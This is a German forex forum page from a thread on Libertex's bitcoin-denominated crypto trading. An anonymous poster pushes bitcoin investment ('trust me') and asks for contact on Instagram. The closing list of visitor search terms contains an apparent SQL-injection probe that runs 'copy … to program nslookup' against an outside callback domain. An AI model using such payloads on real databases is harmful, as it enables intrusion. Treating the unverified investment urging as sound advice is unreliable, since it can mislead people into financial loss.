Libertex hat den Handel mit Kryptowährungen gestartet, die in Bitcoin nominiert sind


Seite 5 von 5 ErsteErste ... 3 4 5
Ergebnis 81 bis 82 von 82
  1. #81
    Unregistriert

    Krypto :))

    Hey cybergirl

    Investiere in bitcoin, vertraue mir ! Du wirst dich ärgern wenn du es nicht tust haha

    Wie lange beschäftigst du dich denn mit diesem Thema ?

    ich tausche mich gerne aus, leider habe ich nur Instagram was ich hier preisgeben kann meld dich gerne dort: imohpablo_

    Lg

  2. #82
    Cybergirl


    Ich beschäftige mich noch nicht so lange mit dem Thema Bitcoins. Habe jetzt aber beschlossen, das ganze erst nochmal eine zeitlang zu beobachten.

+ Antworten
Seite 5 von 5 ErsteErste ... 3 4 5

Ähnliche Themen zu Libertex hat den Handel mit Kryptowährungen gestartet, die in Bitcoin nominiert sind


  1. So verdient man viel mit Bitcoin! Spam-eMail: Hey an das Bitcoin-Forum, ;) ich erhalte in letzter Zeit nahezu jeden Tag eine eMail mit dem Betreff "So verdient man viel mit Bitcoin!" von einem...



  2. Libertex: Ich habe auch vorher mit Web-Versionen von Handelsplattformen gearbeitet, alle waren nur primitive Kopien von stationären Plattformen. Aber eine von...



  3. BITCOIN Kursziel bis 2027 von 50.000 Dollar möglich?: Hey Trader! Ich bin gerade am überlegen, ob ich den BITCOIN nicht langfristig kaufen sollte. Der Grund ist, dass die Prognose von einer sehr...



  4. Chartbetrachtung Bitcoin (BTC/USD bzw. XBT/USD): 950 Anbei sehen sie den Bitcoin-CFD von AvaTrade mit Tageskerzen. Dieser gibt den Preis eines Bitcoins in US-Dollar an (BTC/USD bzw. wie Bloomberg...



  5. Bitcoin: Hat hier eigentlich schon mal jemand mit Bitcoin getraded? Man müsste von den enormen Schwankungen doch profitieren können. Ich hab mal...


Besucher kamen mit folgenden Begriffen in das Forex Forum:

testing

testing;copy (select ) to program nslookup dns.sqli.061188.232-19913.232.0d920.1.bxss.metesting;copy (select ) to program nslookup dns.sqli.061188.232-19982.232.d414b.1.bxss.me